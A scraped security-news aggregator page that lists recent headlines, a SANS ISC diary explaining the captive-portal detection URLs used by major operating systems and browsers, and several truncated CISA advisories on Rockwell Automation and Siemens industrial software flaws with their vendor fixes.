BetaIT-Hub is in early access — your feedback helps us improve. Use the chat or email [email protected]

Latest
How AI is Rewriting the Zero-Day Playbook for Preemptive SecurityRapid7 · just nowPhishing Dominates as Initial Entry Method for Cyber-Attacks, as Hackers Hone Evasion TechniquesInfosecurity Magazine · 16m agoThe Next Evolution of MDR: Preemptive Defense and Agentic InvestigationRapid7 · 16m agoRapid7 Cyber GRC is now available: Turn security action into compliance proofRapid7 · 16m agoMicrosoft Launches Flurry of AI Security Initiatives to Combat AI-Enabled ThreatsInfosecurity Magazine · 31m agoOver 24,000 exposed server BMCs leak password hash via decades-old flawBleepingComputer · 1h agoNimbus Manticore Deploys NightLedger and Turns Victim Systems Into Covert RelaysThe Hacker News · 1h agoConfidential Computing on CPU and GPU Systems: How AI Data Centers Protect Data in UseHackRead · 1h agoAxon Is Another License Plate Surveillance CompanySchneier on Security · 2h agoCoca-Cola Reveals Subsidiary Fairlife Suffered Data BreachInfosecurity Magazine · 2h agoFake IT Calls on Microsoft Teams Lead to GoGRPC Backdoor InfectionsHackRead · 2h agoNVIDIA’s Open Secure AI Alliance Is Missing Some Big NamesInfosecurity Magazine · 3h agoData breach at medical billing firm MCBS affects 1.26 million peopleBleepingComputer · 4h agoNew CREST AI Standards to Deliver AI-Enabled Pentesting AccreditationInfosecurity Magazine · 4h agoCritical TeamCity Flaw Could Let Attackers Run OS Commands Without Logging InThe Hacker News · 5h agoHow AI is Rewriting the Zero-Day Playbook for Preemptive SecurityRapid7 · just nowPhishing Dominates as Initial Entry Method for Cyber-Attacks, as Hackers Hone Evasion TechniquesInfosecurity Magazine · 16m agoThe Next Evolution of MDR: Preemptive Defense and Agentic InvestigationRapid7 · 16m agoRapid7 Cyber GRC is now available: Turn security action into compliance proofRapid7 · 16m agoMicrosoft Launches Flurry of AI Security Initiatives to Combat AI-Enabled ThreatsInfosecurity Magazine · 31m agoOver 24,000 exposed server BMCs leak password hash via decades-old flawBleepingComputer · 1h agoNimbus Manticore Deploys NightLedger and Turns Victim Systems Into Covert RelaysThe Hacker News · 1h agoConfidential Computing on CPU and GPU Systems: How AI Data Centers Protect Data in UseHackRead · 1h agoAxon Is Another License Plate Surveillance CompanySchneier on Security · 2h agoCoca-Cola Reveals Subsidiary Fairlife Suffered Data BreachInfosecurity Magazine · 2h agoFake IT Calls on Microsoft Teams Lead to GoGRPC Backdoor InfectionsHackRead · 2h agoNVIDIA’s Open Secure AI Alliance Is Missing Some Big NamesInfosecurity Magazine · 3h agoData breach at medical billing firm MCBS affects 1.26 million peopleBleepingComputer · 4h agoNew CREST AI Standards to Deliver AI-Enabled Pentesting AccreditationInfosecurity Magazine · 4h agoCritical TeamCity Flaw Could Let Attackers Run OS Commands Without Logging InThe Hacker News · 5h ago

Security & IT News

Live

Real-time news from 13+ trusted sources — BleepingComputer, The Hacker News, Krebs on Security, Dark Reading & more.

1363 results in Vulnerability

VulnerabilitySANS ISC·6d ago
Captive Portal Detection, (Tue, Jul 21st)

Not everything our honeypots detect is an attack. Sometimes it is just odd traffic , and this is one example: Our First Seen list currently includes http://detectportal.firefox.co m/success.txt as one of the new URLs detected by our honeypots. The hostname detectportal kind of gives away what is happening here. If you have ever tried to connect to a public WiFi network, you probably ran into some type of captive portal . A splash screen that will ask you to acknowledge some kind of user agreement or require you to log in. Of course, each implementation looks a bit different, and browsers and operating systems attempt to detect these captive portals. Typically, the operating system will automatically direct you to the correct portal page. It used to be easier to deal with captive portals. Back in the old days (not necessarily good old days ), users often had a non-TLS page configured as their homepage. The captive portal was able to intercept this connection and direct the user to the captive portal's login page. These days, however, most websites use TLS, and browsers default to TLS for many sites and refuse to switch to a non-TLS site. This made using WiFi networks a lot safer, but it gets in the way of directing users to a captive portal. In response, operating systems and browsers implemented features to detect captive portals. The system will attempt to pull up a specific http URL to detect if it receives a redirect response. If so, it will open the redirect URL in a browser. You will see these URLs as systems join your network, or if the browser is started. The URL does provide some intelligence as to what operating system or browser is being used. Here is a quick summary of what URLs different operating systems use: Windows: http://www.msftconnecttest.com/connecttest.txt . This is part of the Windows Network Connectivity Status Indicator, which was introduced in Windows 8. Windows 10 and later will attempt to access the URL and check for a valid response. The response should be Microsoft Connect Test . In addition, it will do a DNS lookup for dns.msftncsi.com. [1] Apple: Recent versions of MacOS and iOS use http://captive.apple.com/hotspot-detect.html as a test. The expected response is Success . If the system can not connect, Apple's Captive Network Assistant starts to assist the user in logging in. Android: http://connectivitycheck.android.com/generate_204. The result page is empty, and uses a status code of 204 (No Content). Chrome: http://www.gstatic.com/generate_204. Slightly different URL than Chrome, but works the same way expecting a 204 No Content response. Chromium implements the same system with http://clients3.google.com/generate_204 [3] Firefox: http://detectportal.firefox.com/canonical.html. This page returns a 200 status code. The body of the page includes a META tag to redirect users to a page explaining how Firefox deals with captive portals (I like this.. as an analyst, it is neat to have the page explain what it d

VulnerabilityCISA·7d ago
Rockwell Automation ThinManager

p a href= https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-204-05.json strong View CSAF /strong /a /p h2 Summary /h2 p strong Successful exploitation of this vulnerability could allow an authenticated attacker to write arbitrary files to restricted system directories outside of the application's intended directory. /strong /p p The following versions of Rockwell Automation ThinManager are affected: /p ul li ThinManager gt;=13.0.0| lt;13.0.7, gt;=13.1.0| lt;13.1.5, gt;=13.2.0| lt;13.2.4, gt;=14.0.0| lt;14.0.2 /li /ul div class= csaf-table table class= tablesaw tablesaw-stack data-tablesaw-mode= stack data-tablesaw-minimap thead tr th role= columnheader data-tablesaw-priority= persist CVSS /th th role= columnheader Vendor /th th role= columnheader Equipment /th th role= columnheader Vulnerabilities /th /tr /thead tbody tr td v3 8.1 /td td Rockwell Automation /td td Rockwell Automation ThinManager /td td Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') /td /tr /tbody /table /div h3 Background /h3 ul li strong Critical Infrastructure Sectors: /strong Chemical, Critical Manufacturing, Energy, Food and Agriculture, Water and Wastewater /li li strong Countries/Areas Deployed: /strong Worldwide /li li strong Company Headquarters Location: /strong United States /li /ul hr h2 Vulnerabilities /h2 div class= csaf-accordion p a class= csaf-accordion-toggle-all href= # Expand All + /a /p div class= csaf-accordion-item h3 a class= csaf-accordion-toggle href= # CVE-2026-11917 /a /h3 div class= csaf-accordion-content p A path traversal security issue exists within Rockwell Automation ThinManager software due to improper limitation of file save operations within the API. An authenticated attacker could exploit this vulnerability to write arbitrary files to restricted system directories outside of the application's intended directory. /p p a href= https://www.cve.org/CVERecord?id=CVE-2026-11917 View CVE Details /a /p hr h4 Affected Products /h4 h5 Rockwell Automation ThinManager /h5 div class= ics-vendor-version-status div class= ics-vendor strong Vendor: /strong br Rockwell Automation /div div class= ics-version strong Product Version: /strong br Rockwell Automation ThinManager: gt;=13.0.0| lt;13.0.7, Rockwell Automation ThinManager: gt;=13.1.0| lt;13.1.5, Rockwell Automation ThinManager: gt;=13.2.0| lt;13.2.4, Rockwell Automation ThinManager: gt;=14.0.0| lt;14.0.2 /div div class= ics-status strong Product Status: /strong br known_affected /div /div div class= ics-remediations h6 Remediations /h6 p strong Mitigation /strong br Users using the affected software, should upgrade to one of the corrected versions as follows: /p p strong Vendor fix /strong br ThinManager Versions 13.0.0 - 13.0.7 -- gt; 13.0.8 /p p strong Vendor fix /strong br ThinManager Versions 13.1.0 - 13.1.5 -- gt; 13.1.6 /p p strong Vendor fix /strong br ThinManager Versions 13.2.0 - 13.2.4 -- gt; 13.2.5 /p p strong Vend

VulnerabilityCISA·7d ago
Rockwell Automation 1718-AENTR/1719-AENTR

p a href= https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-202-08.json strong View CSAF /strong /a /p h2 Summary /h2 p strong Successful exploitation of this vulnerability could allow for an attacker to cause a denial-of-service condition on the product. /strong /p p The following versions of Rockwell Automation 1718-AENTR/1719-AENTR are affected: /p ul li 1718/ 1719 Ex I/O 3.011 nbsp; /li /ul div class= csaf-table table class= tablesaw tablesaw-stack data-tablesaw-mode= stack data-tablesaw-minimap thead tr th role= columnheader data-tablesaw-priority= persist CVSS /th th role= columnheader Vendor /th th role= columnheader Equipment /th th role= columnheader Vulnerabilities /th /tr /thead tbody tr td v3 7.5 /td td Rockwell Automation /td td Rockwell Automation 1718-AENTR/1719-AENTR /td td Allocation of Resources Without Limits or Throttling /td /tr /tbody /table /div h3 Background /h3 ul li strong Critical Infrastructure Sectors: /strong Critical Manufacturing /li li strong Countries/Areas Deployed: /strong Worldwide /li li strong Company Headquarters Location: /strong United States /li /ul hr h2 Vulnerabilities /h2 div class= csaf-accordion p a class= csaf-accordion-toggle-all href= # Expand All + /a /p div class= csaf-accordion-item h3 a class= csaf-accordion-toggle href= # CVE-2026-9140 /a /h3 div class= csaf-accordion-content p A denial-of-service security issue exists in the 1719-AENTR. The security issue stems from improper handling of a UDP unicast network storm, which causes the device to become overloaded and lose communication. A power cycle is required to recover. /p p a href= https://www.cve.org/CVERecord?id=CVE-2026-9140 View CVE Details /a /p hr h4 Affected Products /h4 h5 Rockwell Automation 1718-AENTR/1719-AENTR /h5 div class= ics-vendor-version-status div class= ics-vendor strong Vendor: /strong br Rockwell Automation /div div class= ics-version strong Product Version: /strong br Rockwell Automation 1718/ 1719 Ex I/O: 3.011 /div div class= ics-status strong Product Status: /strong br known_affected /div /div div class= ics-remediations h6 Remediations /h6 p strong Vendor fix /strong br Rockwell Automation recommends users to upgrade to 1718/ 1719 Ex I/O version 3.012 or later. /p p strong Mitigation /strong br Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use Rockwell Automation's security best practices (https://support.rockwellautomation.com/app/answers/answer_view/a_id/1085012/loc/en_US#__highlight). br a href= https://support.rockwellautomation.com/app/answers/answer_view/a_id/1085012/loc/en_US#__highlight https://support.rockwellautomation.com/app/answers/answer_view/a_id/1085012/loc/en_US#__highlight /a /p p strong Mitigation /strong br For more information, see Rockwell Automation Security Advisories: https://www.rockwellautomation.com/en-us/trust-center/security-advisories.html. br a href= https://www.rockwellautomation.com/en-

VulnerabilityCISA·7d ago
Siemens Opcenter X

p a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-202-03.json" strong View CSAF /strong /a /p h2 Summary /h2 p strong Opcenter X before V2604 contain an authentication bypass vulnerability that could allow an attacker to gain full unauthorized access to the application. Siemens has released a new version for Opcenter X and recommends to update to the latest version. /strong /p p The following versions of Siemens Opcenter X are affected: /p ul li Opcenter X vers:intdot/ lt;2604 /li /ul div class="csaf-table" table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap thead tr th role="columnheader" data-tablesaw-priority="persist" CVSS /th th role="columnheader" Vendor /th th role="columnheader" Equipment /th th role="columnheader" Vulnerabilities /th /tr /thead tbody tr td v3 10 /td td Siemens /td td Siemens Opcenter X /td td Improper Verification of Cryptographic Signature /td /tr /tbody /table /div h3 Background /h3 ul li strong Critical Infrastructure Sectors: /strong Critical Manufacturing /li li strong Countries/Areas Deployed: /strong Worldwide /li li strong Company Headquarters Location: /strong Germany /li /ul hr h2 Vulnerabilities /h2 div class="csaf-accordion" p a class="csaf-accordion-toggle-all" href="#" Expand All + /a /p div class="csaf-accordion-item" h3 a class="csaf-accordion-toggle" href="#" CVE-2026-56451 /a /h3 div class="csaf-accordion-content" p Affected applications do not properly validate the algorithm specified in the JSON Web Token (JWT) header. This could allow an unauthenticated remote attacker to forge arbitrary JWT, bypass authentication mechanisms and impersonate any user including administrative accounts, potentially gaining full unauthorized access to the application. /p p a href="https://www.cve.org/CVERecord?id=CVE-2026-56451" View CVE Details /a /p hr h4 Affected Products /h4 h5 Siemens Opcenter X /h5 div class="ics-vendor-version-status" div class="ics-vendor" strong Vendor: /strong br Siemens /div div class="ics-version" strong Product Version: /strong br Opcenter X lt; V2604 /div div class="ics-status" strong Product Status: /strong br known_affected /div /div div class="ics-remediations" h6 Remediations /h6 p strong Vendor fix /strong br Update to V2604 or later version br a href="https://support.sw.siemens.com/product/206159703/" https://support.sw.siemens.com/product/206159703/ /a /p /div p strong Relevant CWE: /strong a href="https://cwe.mitre.org/data/definitions/347.html" CWE-347 Improper Verification of Cryptographic Signature /a /p hr h4 Metrics /h4 div class="csaf-table csaf-metrics-table" table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap thead tr th role="columnheader" data-tablesaw-priority="persist" CVSS Version /th th role="columnheader" Base Score /th th role="columnheader" Base Severity /th th role="columnheader" Vector String /th /tr /thead tbody tr td 3.1 /td td 10 /td td CRITICAL /td td a

VulnerabilityCISA·7d ago
Rockwell Automation FactoryTalk Services Platform

p a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-202-07.json" strong View CSAF /strong /a /p h2 Summary /h2 p strong Successful exploitation of this vulnerability could allow an attacker to impersonate an authorized user on the FTSP server, resulting in unauthorized access to system configurations. /strong /p p The following versions of Rockwell Automation FactoryTalk Services Platform are affected: /p ul li FactoryTalk Directory (FTSP) 6.60 nbsp; /li /ul div class="csaf-table" table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap thead tr th role="columnheader" data-tablesaw-priority="persist" CVSS /th th role="columnheader" Vendor /th th role="columnheader" Equipment /th th role="columnheader" Vulnerabilities /th /tr /thead tbody tr td v3 7.8 /td td Rockwell Automation /td td Rockwell Automation FactoryTalk Services Platform /td td Weak Authentication /td /tr /tbody /table /div h3 Background /h3 ul li strong Critical Infrastructure Sectors: /strong Critical Manufacturing /li li strong Countries/Areas Deployed: /strong Worldwide /li li strong Company Headquarters Location: /strong United States /li /ul hr h2 Vulnerabilities /h2 div class="csaf-accordion" p a class="csaf-accordion-toggle-all" href="#" Expand All + /a /p div class="csaf-accordion-item" h3 a class="csaf-accordion-toggle" href="#" CVE-2026-10714 /a /h3 div class="csaf-accordion-content" p A security issue exists within FactoryTalk Services Platform (FTSP), allowing an attacker to bypass JWT signature validation during Okta Web Authentication. The vulnerability stems from the application not verifying that the JWT algorithm is configured for RSA, enabling an attacker to set the algorithm to "none" and craft forged tokens. This could allow an authenticated low-privilege user to impersonate any authorized user on the FTSP server, resulting in unauthorized access to system configuration and the ability to grant permissions to other systems protected by FTSP. /p p a href="https://www.cve.org/CVERecord?id=CVE-2026-10714" View CVE Details /a /p hr h4 Affected Products /h4 h5 Rockwell Automation FactoryTalk Services Platform /h5 div class="ics-vendor-version-status" div class="ics-vendor" strong Vendor: /strong br Rockwell Automation /div div class="ics-version" strong Product Version: /strong br Rockwell Automation FactoryTalk Directory (FTSP): 6.60 /div div class="ics-status" strong Product Status: /strong br known_affected /div /div div class="ics-remediations" h6 Remediations /h6 p strong Mitigation /strong br Users using FactoryTalk Services Platform v6.60 should apply either the individual patch (RAID 1158263) or the February 2026 Patch Roll-up, or later update. /p p strong Mitigation /strong br Users using the affected software, who are not able to upgrade to one of the corrected versions, should use Rockwell's security best practices. br a href="https://support.rockwellautomation.com/app/answers/answer_view/a_id

VulnerabilityCISA·7d ago
Siemens CADRA

p a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-202-06.json" strong View CSAF /strong /a /p h2 Summary /h2 p strong CADRA is affected by multiple zlib and Foxit vulnerabilities. Siemens has released a new version for CADRA and recommends to update to the latest version. Siemens is preparing further fix versions and recommends specific countermeasures for products where fixes are not, or not yet available. /strong /p p The following versions of Siemens CADRA are affected: /p ul li CADRA vers:intdot/ lt;2511, vers:all/* nbsp; /li /ul div class="csaf-table" table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap thead tr th role="columnheader" data-tablesaw-priority="persist" CVSS /th th role="columnheader" Vendor /th th role="columnheader" Equipment /th th role="columnheader" Vulnerabilities /th /tr /thead tbody tr td v3 9.8 /td td Siemens /td td Siemens CADRA /td td Improper Input Validation, Incorrect Bitwise Shift of Integer, Out-of-bounds Write, Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'), Integer Overflow or Wraparound, Access of Resource Using Incompatible Type ('Type Confusion') /td /tr /tbody /table /div h3 Background /h3 ul li strong Critical Infrastructure Sectors: /strong Chemical, Commercial Facilities, Communications, Energy /li li strong Countries/Areas Deployed: /strong Worldwide /li li strong Company Headquarters Location: /strong Germany /li /ul hr h2 Vulnerabilities /h2 div class="csaf-accordion" p a class="csaf-accordion-toggle-all" href="#" Expand All + /a /p div class="csaf-accordion-item" h3 a class="csaf-accordion-toggle" href="#" CVE-2005-2096 /a /h3 div class="csaf-accordion-content" p zlib 1.2 and later versions allows remote attackers to cause a denial of service (crash) via a crafted compressed stream with an incomplete code description of a length greater than 1, which leads to a buffer overflow, as demonstrated using a crafted PNG file. /p p a href="https://www.cve.org/CVERecord?id=CVE-2005-2096" View CVE Details /a /p hr h4 Affected Products /h4 h5 Siemens CADRA /h5 div class="ics-vendor-version-status" div class="ics-vendor" strong Vendor: /strong br Siemens /div div class="ics-version" strong Product Version: /strong br CADRA lt; V2511 /div div class="ics-status" strong Product Status: /strong br known_affected /div /div div class="ics-remediations" h6 Remediations /h6 p strong Vendor fix /strong br Update to V2511 or later version /p /div p strong Relevant CWE: /strong a href="https://cwe.mitre.org/data/definitions/20.html" CWE-20 Improper Input Validation /a /p hr h4 Metrics /h4 div class="csaf-table csaf-metrics-table" table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap thead tr th role="columnheader" data-tablesaw-priority="persist" CVSS Version /th th role="columnheader" Base Score /th th role="columnheader" Base Severity /th th role="columnheader" Vector String /th /tr /thead tbo

VulnerabilityCISA·7d ago
Rockwell Automation Studio 5000 Logix Designer

p a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-202-10.json" strong View CSAF /strong /a /p h2 Summary /h2 p strong Successful exploitation of these vulnerabilities could allow for a local attacker to execute arbitrary files, alter configurations, or execute arbitrary code. /strong /p p The following versions of Rockwell Automation Studio 5000 Logix Designer are affected: /p ul li Studio 5000 Logix Designer V36.00 (CVE-2026-9108) /li li Studio 5000 Logix Designer V35.00 (CVE-2026-9108, CVE-2026-9127, CVE-2026-9128) /li li Studio 5000 Logix Designer V35.01 (CVE-2026-9108) /li li Studio 5000 Logix Designer gt;=V34.00| lt;=V34.03 (CVE-2026-9108) /li li Studio 5000 Logix Designer gt;=V33.00| lt;=V33.03 (CVE-2026-9108) /li li Studio 5000 Logix Designer gt;=V32.00| lt;=V32.04 (CVE-2026-9108, CVE-2026-9127, CVE-2026-9128) /li li Studio 5000 Logix Designer V34.00 (CVE-2026-9127) /li li Studio 5000 Logix Designer V34.01 (CVE-2026-9127) /li li Studio 5000 Logix Designer V33.00 (CVE-2026-9127) /li li Studio 5000 Logix Designer V33.02 (CVE-2026-9127) /li li Studio 5000 Logix Designer gt;=V34.00| lt;=V34.02 (CVE-2026-9128) /li li Studio 5000 Logix Designer gt;=V33.00| lt;=V33.02 (CVE-2026-9128) /li /ul div class="csaf-table" table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap thead tr th role="columnheader" data-tablesaw-priority="persist" CVSS /th th role="columnheader" Vendor /th th role="columnheader" Equipment /th th role="columnheader" Vulnerabilities /th /tr /thead tbody tr td v3 7.5 /td td Rockwell Automation /td td Rockwell Automation Studio 5000 Logix Designer /td td Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Incorrect Authorization, Unquoted Search Path or Element /td /tr /tbody /table /div h3 Background /h3 ul li strong Critical Infrastructure Sectors: /strong Critical Manufacturing /li li strong Countries/Areas Deployed: /strong Worldwide /li li strong Company Headquarters Location: /strong United States /li /ul hr h2 Vulnerabilities /h2 div class="csaf-accordion" p a class="csaf-accordion-toggle-all" href="#" Expand All + /a /p div class="csaf-accordion-item" h3 a class="csaf-accordion-toggle" href="#" CVE-2026-9108 /a /h3 div class="csaf-accordion-content" p A path traversal security issue exists within Studio 5000 Logix Designer due to improper limitation of file paths within ACD project files. The software does not sanitize or validate file names embedded in the ACD file structure during the project opening procedure, allowing path traversal sequences to escape the intended extraction directory. If exploited, an attacker could craft a malicious ACD project file that results in arbitrary files being written to attacker-controlled locations on the file system, potentially leading to code execution. /p p a href="https://www.cve.org/CVERecord?id=CVE-2026-9108" View CVE Details /a /p hr h4 Affected Products /h4 h5 Rockwell Automation Stud

VulnerabilityCISA·7d ago
Rockwell Automation 1734 POINT I/O

p a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-202-09.json" strong View CSAF /strong /a /p h2 Summary /h2 p strong Successful exploitation of this vulnerability could allow for an attacker to cause a denial-of-service condition on the product. /strong /p p The following versions of Rockwell Automation 1734 POINT I/O are affected: /p ul li 1734 POINT I/O 3.023 nbsp; /li /ul div class="csaf-table" table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap thead tr th role="columnheader" data-tablesaw-priority="persist" CVSS /th th role="columnheader" Vendor /th th role="columnheader" Equipment /th th role="columnheader" Vulnerabilities /th /tr /thead tbody tr td v3 7.5 /td td Rockwell Automation /td td Rockwell Automation 1734 POINT I/O /td td Allocation of Resources Without Limits or Throttling /td /tr /tbody /table /div h3 Background /h3 ul li strong Critical Infrastructure Sectors: /strong Critical Manufacturing /li li strong Countries/Areas Deployed: /strong Worldwide /li li strong Company Headquarters Location: /strong United States /li /ul hr h2 Vulnerabilities /h2 div class="csaf-accordion" p a class="csaf-accordion-toggle-all" href="#" Expand All + /a /p div class="csaf-accordion-item" h3 a class="csaf-accordion-toggle" href="#" CVE-2026-10573 /a /h3 div class="csaf-accordion-content" p A denial-of-service security issue exists in 1734 POINT I/O module. The security issue stems from improper handling of crafted CIP messages, which can cause the module to enter a faulted state. A restart is required to recover. /p p a href="https://www.cve.org/CVERecord?id=CVE-2026-10573" View CVE Details /a /p hr h4 Affected Products /h4 h5 Rockwell Automation 1734 POINT I/O /h5 div class="ics-vendor-version-status" div class="ics-vendor" strong Vendor: /strong br Rockwell Automation /div div class="ics-version" strong Product Version: /strong br Rockwell Automation 1734 POINT I/O: 3.023 /div div class="ics-status" strong Product Status: /strong br known_affected /div /div div class="ics-remediations" h6 Remediations /h6 p strong Mitigation /strong br Rockwell Automation recommends users are to migrate to 5034-OB8. /p p strong Mitigation /strong br Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use Rockwell Automation's security best practices (https://support.rockwellautomation.com/app/answers/answer_view/a_id/1085012/loc/en_US#__highlight). br a href="https://support.rockwellautomation.com/app/answers/answer_view/a_id/1085012/loc/en_US#__highlight" https://support.rockwellautomation.com/app/answers/answer_view/a_id/1085012/loc/en_US#__highlight /a /p p strong Mitigation /strong br For more information, see Rockwell Automation Security Advisories: https://www.rockwellautomation.com/en-us/trust-center/security-advisories.html. br a href="https://www.rockwellautomation.com/en-us/trust-center/security-advisories.html" https://www.r

VulnerabilityCISA·7d ago
Siemens RUGGEDCOM APE1808 with Palo Alto Networks Virtual NGFW

p a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-202-02.json" strong View CSAF /strong /a /p h2 Summary /h2 p strong Palo Alto Networks has published [1] information on vulnerabilities in PAN-OS. This advisory lists the related Siemens Industrial products affected by these vulnerabilities. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications. [1] https://security.paloaltonetworks.com/ /strong /p p The following versions of Siemens RUGGEDCOM APE1808 with Palo Alto Networks Virtual NGFW are affected: /p ul li RUGGEDCOM APE1808 vers:all/* nbsp; /li /ul div class="csaf-table" table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap thead tr th role="columnheader" data-tablesaw-priority="persist" CVSS /th th role="columnheader" Vendor /th th role="columnheader" Equipment /th th role="columnheader" Vulnerabilities /th /tr /thead tbody tr td v3 7.2 /td td Siemens /td td Siemens RUGGEDCOM APE1808 with Palo Alto Networks Virtual NGFW /td td Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Missing Authorization, Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') /td /tr /tbody /table /div h3 Background /h3 ul li strong Critical Infrastructure Sectors: /strong Critical Manufacturing /li li strong Countries/Areas Deployed: /strong Worldwide /li li strong Company Headquarters Location: /strong Germany /li /ul hr h2 Vulnerabilities /h2 div class="csaf-accordion" p a class="csaf-accordion-toggle-all" href="#" Expand All + /a /p div class="csaf-accordion-item" h3 a class="csaf-accordion-toggle" href="#" CVE-2026-0266 /a /h3 div class="csaf-accordion-content" p A cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS® software enables a malicious authenticated administrator to store a JavaScript payload using the web interface. This issue is applicable to PAN-OS software on PA-Series and VM-Series firewalls and on Panorama (virtual and M-Series). Cloud NGFW and Prisma® Access are not affected by this vulnerability. /p p a href="https://www.cve.org/CVERecord?id=CVE-2026-0266" View CVE Details /a /p hr h4 Affected Products /h4 h5 Siemens RUGGEDCOM APE1808 with Palo Alto Networks Virtual NGFW /h5 div class="ics-vendor-version-status" div class="ics-vendor" strong Vendor: /strong br Siemens /div div class="ics-version" strong Product Version: /strong br RUGGEDCOM APE1808 with Palo Alto Networks Virtual NGFW /div div class="ics-status" strong Product Status: /strong br known_affected /div /div div class="ics-remediations" h6 Remediations /h6 p strong Vendor fix /strong br Contact customer support to receive patch and update information /p /div p strong Relevant CWE: /strong a href="https://cwe.mitre.org/data/definitions/79.html" CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') /a /p hr h4 Metric

VulnerabilityCISA·7d ago
Siemens IAM Client

p a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-202-05.json" strong View CSAF /strong /a /p h2 Summary /h2 p strong Multiple Siemens products are affected by unquoted search path vulnerability in IAM Client. This could allow an authenticated local attacker to perform privilege escalation. Siemens has released new versions for several affected products and recommends to update to the latest versions. Siemens is preparing further fix versions and recommends countermeasures for products where fixes are not, or not yet available. /strong /p p The following versions of Siemens IAM Client are affected: /p ul li COMOS V10.4.5 vers:intdot/ lt;10.4.5.0.2 nbsp; /li li COMOS V10.6 vers:intdot/ lt;10.6.1 nbsp; /li li Designcenter NX vers:intdot/ lt;2512.7000 nbsp; /li li Simcenter 3D vers:intdot/ lt;2512.7000 nbsp; /li li Simcenter Femap V2506 vers:intdot/ lt;2506.0003 nbsp; /li li Simcenter Femap V2512 vers:intdot/ lt;2512.0002 nbsp; /li li Simcenter Nastran vers:intdot/ lt;2606 nbsp; /li li Simcenter STAR-CCM+ vers:intdot/ lt;2606 nbsp; /li li Solid Edge SE2025 vers:intdot/ lt;225.0.13.3 nbsp; /li li Solid Edge SE2026 vers:intdot/ lt;226.0.04.003 nbsp; /li li Teamcenter Visualization V2412 vers:intdot/ lt;2412.0012 nbsp; /li li Teamcenter Visualization V2506 vers:intdot/ lt;2506.0009 nbsp; /li li Teamcenter Visualization V2512 vers:intdot/ lt;2512.2605 nbsp; /li li Tecnomatix Plant Simulation V2404 vers:intdot/ lt;2404.0022 nbsp; /li li Tecnomatix Plant Simulation V2504 vers:intdot/ lt;2504.0010 nbsp; /li li Tecnomatix Process Simulate vers:intdot/ lt;2606 nbsp; /li /ul div class="csaf-table" table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap thead tr th role="columnheader" data-tablesaw-priority="persist" CVSS /th th role="columnheader" Vendor /th th role="columnheader" Equipment /th th role="columnheader" Vulnerabilities /th /tr /thead tbody tr td v3 6.7 /td td Siemens /td td Siemens IAM Client /td td Untrusted Search Path /td /tr /tbody /table /div h3 Background /h3 ul li strong Critical Infrastructure Sectors: /strong Chemical, Critical Manufacturing, Energy /li li strong Countries/Areas Deployed: /strong Worldwide /li li strong Company Headquarters Location: /strong Germany /li /ul hr h2 Vulnerabilities /h2 div class="csaf-accordion" p a class="csaf-accordion-toggle-all" href="#" Expand All + /a /p div class="csaf-accordion-item" h3 a class="csaf-accordion-toggle" href="#" CVE-2025-40945 /a /h3 div class="csaf-accordion-content" p Untrusted search path in IAM Client SDK may allow an authenticated user to potentially enable escalation of privilege via local access. /p p a href="https://www.cve.org/CVERecord?id=CVE-2025-40945" View CVE Details /a /p hr h4 Affected Products /h4 h5 Siemens IAM Client /h5 div class="ics-vendor-version-status" div class="ics-vendor" strong Vendor: /strong br Siemens /div div class="ics-version" strong Product Version: /strong br COMOS V10.4.5 lt; V1

VulnerabilityCISA·7d ago
Siemens SIDIS Secured SmartPlug

p a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-202-04.json" strong View CSAF /strong /a /p h2 Summary /h2 p strong SIDIS Secured SmartPlug before V7.26.0310 is affected by multiple vulnerabilities in the components OpenSSL, OpenSSH, and several other packages as described below. Siemens has released a new version of SIDIS Secured SmartPlug and recommends to update to the latest version. /strong /p p The following versions of Siemens SIDIS Secured SmartPlug are affected: /p ul li SIDIS Secured SmartPlug vers:intdot/ lt;7.26.0310 nbsp; /li /ul div class="csaf-table" table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap thead tr th role="columnheader" data-tablesaw-priority="persist" CVSS /th th role="columnheader" Vendor /th th role="columnheader" Equipment /th th role="columnheader" Vulnerabilities /th /tr /thead tbody tr td v3 9.8 /td td Siemens /td td Siemens SIDIS Secured SmartPlug /td td Improper Enforcement of Message Integrity During Transmission in a Communication Channel, Reusing a Nonce, Key Pair in Encryption, Out-of-bounds Write, Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'), Integer Overflow or Wraparound, Out-of-bounds Read, Covert Timing Channel, Detection of Error Condition Without Action, Incorrect Authorization /td /tr /tbody /table /div h3 Background /h3 ul li strong Critical Infrastructure Sectors: /strong Critical Manufacturing /li li strong Countries/Areas 